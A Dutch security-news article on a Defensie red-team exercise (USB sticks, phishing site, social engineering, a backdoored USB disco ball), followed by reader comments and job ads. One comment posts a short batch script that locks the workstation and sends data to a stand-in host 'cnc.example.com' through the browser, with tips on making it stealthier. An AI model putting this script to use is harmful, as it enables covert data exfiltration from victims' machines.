Defensie test personeel met 'spionage-discobal'
Verschillende Defensiemedewerkers ontvingen de afgelopen weken USB-sticks met de opdracht die op meerdere werkplekken binnen de Rijksoverheid aan te sluiten. Ook werden er verschillende phishingmails
ontdekt die Defensiepersoneel vroegen om op een nagemaakte Defensiesite in te loggen. Een geraffineerde aanval door een buitenlandse mogendheid? Nee, ondanks de waarschuwing op het intranet van Defensie die sommige werknemers deed vermoeden dat het om een echte aanval ging, bleek het een zogeheten 'Red Team' test te zijn.
Via de test wilde Defensie kijken hoe kwetsbaar de organisatie voor spionageaanvallen is. Daarbij werden in totaal zeven scenario’s bedacht, zo laat luitenant-kolonel Hans Edelhausen tegenover Security.NL weten. Edelhausen werkt bij de afdeling Beveiligingsautoriteit van Defensie. Hij bedacht het project, dat onderdeel van het Rijksbrede onderzoek KWAS is, wat staat voor Kwetsbaarheidsanalyse Spionage.
“We wilden ook een keer gaan kijken hoe het met de beveiliging ervoor stond”, merkt Edelhausen op. “Dat was de context voor deze Red Team test.” Uniek aan deze test was dat slechts twee mensen binnen Defensie hiervan op de hoogte waren. “Dat is al uniek, want dit soort activiteiten doen wij periodiek zelf, maar er zijn altijd meer mensen bij betrokken. Het moest een realistische test zijn.” Ook vanuit Justitie was de voorwaarde gesteld dat zo weinig mogelijk mensen van de test afwisten.
Scenario’s
De test bestond in totaal uit 7 scenario’s die over een periode van drie maanden werden uitgewerkt. Het ging om een aanval via per post verstuurde USB-sticks, social engineering per telefoon, een phishingmail gekoppeld aan een nepsite, footprinting van netwerken, netwerkhacking, een fysieke beveiligingstest met een mystery guest en als uitsmijter een gecompromitteerde discobal.
Het betrof een volledig functionerende USB-discobal die was gemanipuleerd en van extra onderdelen voorzien. Die onderdelen startten een sessie zodra het apparaat op de computer werd aangesloten.
Bij het kiezen van de scenario’s werd gekeken hoe potentiële spionnen te werk zouden kunnen gaan. Hoewel er aanvallen via USB-sticks bekend zijn, hebben deze zover Edelhausen weet nog niet in het echt tegen Defensie plaatsgevonden.
Een ander uniek kenmerk van de test was dat een aantal scenario’s tegelijkertijd werd uitgevoerd, om te zien hoe de organisatie hierop reageerde. “We wilden ook de reactietijd van de hele organisatie testen als er verschillende aanvallen plaatsvinden. Dat is op deze wijze en schaal nog nooit getest.”
Voor de phishingsite werd de nepsite rijksauditdiensten.nl geregistreerd, terwijl de echte website op auditdienst.nl te vinden is. Hier werd werknemers gevraagd om met de gegevens voor de MULAN-omgeving (Mijn Uniforme Logische Aansluiting op het Net) in te loggen. Dit is de standaard ICT-werkomgeving van Defensie.
Resultaat
De Red Team test vond in maart plaats en zou drie weken doorlopen, tenzij de doelstelling werd gehaald. De doestelling moest laten zien hoe weerbaar Defensie tegen spionagebedreigingen is. En daar lijkt het goed mee te zitten, aangezien de test voortijdig werd gestaakt. Hoewel de uiteindelijke resultaten nog niet binnen zijn, is Edelhausen positief. Zoals het er nu naar uitziet wisten de aanvallers geen enkel werkstation te compromitteren of medewerker te social engineeren.
Edelhausen schrijft het succes van de verdedigers onder andere toe aan de awarenesstrainingen die personeel moeten volgen. Alle verstuurde USB-sticks werden netjes door de aangeschreven medewerkers bij de lokale veiligheidsfunctionaris ingeleverd. Voor de ‘aangevallen’ werknemers was het de eerste keer dat ze met een geprepareerde USB-stick te maken kregen. “Phishing kenden ze al van thuis, maar een USB-stick was een geheel nieuw facet voor deze mensen”, stelt Edelhausen.
Bij het social engineering scenario werden mensen op hun werkadres gebeld en werd er geprobeerd gevoelige informatie te ontfutselen. Iets wat de social engineers niet lukte. Soms ook omdat Defensiepersoneel vergat terug te bellen. “Er zijn geen medewerkers geweest die privacygevoelige informatie over collega’s hebben verstrekt.”
Defensiemedewerkers hebben de mogelijkheid een e-learning module te volgen waar verschillende dreigingen aan bod komen, waaronder cyber. “Daarom zijn alle scenario’s ook niet gelukt, omdat de awareness bij de mensen goed werkte.”
Toch zijn er ook verbeterpunten, zoals de logistiek en communicatie tussen betrokkenen. Het gaat dan om het overbrengen van de verdachte apparatuur naar de CERT van Defensie voor verder onderzoek. Daarnaast is er ook nog ruimte om de procedures aan te scherpen, bijvoorbeeld bij het bepalen van prioriteiten als er meerdere aanvallen tegelijkertijd plaatsvinden.
Uiteindelijk verscheen er op het Intranet van Defensie een waarschuwing dat er aanvallen plaatsvonden. Een medewerker van Defensie tipte vervolgens Security.NL dat er aanvallen gaande waren. Zowel deze werknemer als de werknemer die het bericht op Intranet had geplaatst wisten niet dat het om een Red Team test ging.
Aanvallers
De test werd door mensen buiten Defensie uitgevoerd, wat betekende dat de ‘aanvallers’ alleen over basisinformatie beschikten. De test moest namelijk zo realistisch mogelijk zijn. “Ze wisten niet precies hoe ons netwerk eruitziet”, laat Edelhausen weten.
Dat had bijvoorbeeld gevolgen voor de test met de USB-sticks. Die gebruikten Autorun en PuTTy om via een bepaalde poort een verbinding naar een zogenaamd kwaadaardige website op te zetten. "Maar of bij Defensie de poorten open of dicht zijn weten de kwaadwillenden van buiten niet.”
Discobal
Aangezien de doelstelling voortijdig werd gehaald was het niet meer nodig om de discobal in te zetten. In totaal werden er vier USB-sticks en vier USB-discoballen gemaakt. De USB-sticks werden naar specifiek uitgezochte Defensiemedewerkers gestuurd. De USB-discobal was volgens Edelhausen ideaal voor een gerichte aanval.
“Ik hem zelf op een testlaptop aangesloten. Hij draait en geeft licht, dat is de afleiding, maar je ziet dus niet dat er een sessie in de achtergrond wordt opgebouwd. Een heel gemeen ding, een ideale backdoor dus.”
Is dat niet het zelfde zeggen als: "We stoppen de voetbalwedstrijd in de 80ste minuut, want team A staat toch met 5-0 voor"?
Terwijl Team B dan net zijn topscoorder in wil brengen die wel eens vaker 6 goals in 10 minuten maakt.
Als die discobal zo goed bedacht was, dan wil je die juist toch wel testen?
Volgens mij hebben ze gewoon afgekapt zodat ze nu kunnen zeggen dat de aanval niet geslaagd is. En zo te horen was de aanval wel gelukt als de discobal uitgeprobeerd was.
Edit:
"Via de test wilde Defensie kijken hoe kwetsbaar de organisatie voor spionageaanvallen is."
Dat is de doelstelling. Hoe kunnen ze die aan getoond hebben als ze niet alles geprobeerd hebben wat ze konden proberen?
REM Usage: data-upload.bat "%u0430%u0437%20%u0431%u0443%u043A%u0438%20%u0432%u0435%u0434%u0438"
REM Workstation locken, geeft je minimaal een paar seconden om te doen wat je wil
rundll32.exe user32.dll,LockWorkStation
REM data export!
start "" "%programfiles%\internet explorer\iexplore" "http://cnc.example.com/?%1"
REM wachten op pageload
ping localhost -n 4
REM en weer opruimen
taskkill /IM "iexplore.exe"
Misschien wat verdacht dat het werkstation zich op een willekeurig moment lockt, maar opzich zie je niks wat je niet elke dag ziet. En met iets meer werk kun je gewoon een geplande taak aanmaken die runt bij het locken, of wanneer een screensaver actief wordt ofzo. En je kan uit het register halen wat de standaardbrowser is (daarom gebruik ik niet "start http://url", dan weet je niet welke browser je moet killen).
Is dat niet het zelfde zeggen als: "We stoppen de voetbalwedstrijd in de 80ste minuut, want team A staat toch met 5-0 voor"?
My two cents.
Iedereen kan in een val trappen. Ik pleit dan ook altijd voor schadebeperkende maatregelen. Waarom mail openen met een (domain-)admin account? Waarom overal hetzelfde wachtwoord (thuis en op het werk)? Waarom vragen ze deze informatie aan de telefoon? enz... De mens blijft in mijn optiek de zwakste schakel.
Mijn mening is dan ook, dat er beter geïnvesteerd kan worden in het opvoeden van de gebruikers, dan in het investeren in dure apparatuur.
Ook open communicatie ipv een afrekencultuur is denk ik belangrijk. Als iemand ergens is ingetrapt, dan gelijk melden ipv onder de pet houden. Men kan er dan gelijk op acteren.
Maar bij beveiliging hoeft de tegenstander maar één keer te scoren en jij moet ALLE aanvallen af weten te weren, anders is hij binnen en is het gebeurd met je. Dus is het wel jammer dat ze voortijdig gestopt zijn (maar misschien was het geld of de tijd op).
Ik sluit me toch aan bij het vermoeden van Whiteking.
Al blijft het zo dat je nooit uitputtend kunt testen, maar alles uit de kast halen wat je hebt liggen is toch wel het minste.
Beste lucb1e,
Dat is nou juist de grap...Die worden niet gepost of fora zoals deze...
Deze posting is gelocked. Reageren is niet meer mogelijk.
Junior DevOps Engineer
Certified Secure is op zoek naar een Junior DevOps Engineer. Deze functie is een stuk interessanter dan de term doet vermoeden! Om jou als potentiële nieuwe collega meteen te laten zien wat we doen hebben we speciaal voor jou een selectie gemaakt van een aantal leuke security challenges. Are you ready for a challenge?
Cybersecurity Trainer / Streamer
Toe aan een nieuwe nieuwe job waarmee je het verschil maakt? In de Certified Secure trainingen laat je deelnemers zien hoe actuele kwetsbaarheden structureel verholpen worden. Ook werk je actief mee aan de ontwikkeling van onze gamified security challenges. Bij het maken van challenges kom je telkens nieuwe technieken tegen, van Flutter tot GraphQL, van Elastic Search tot Kubernetes.
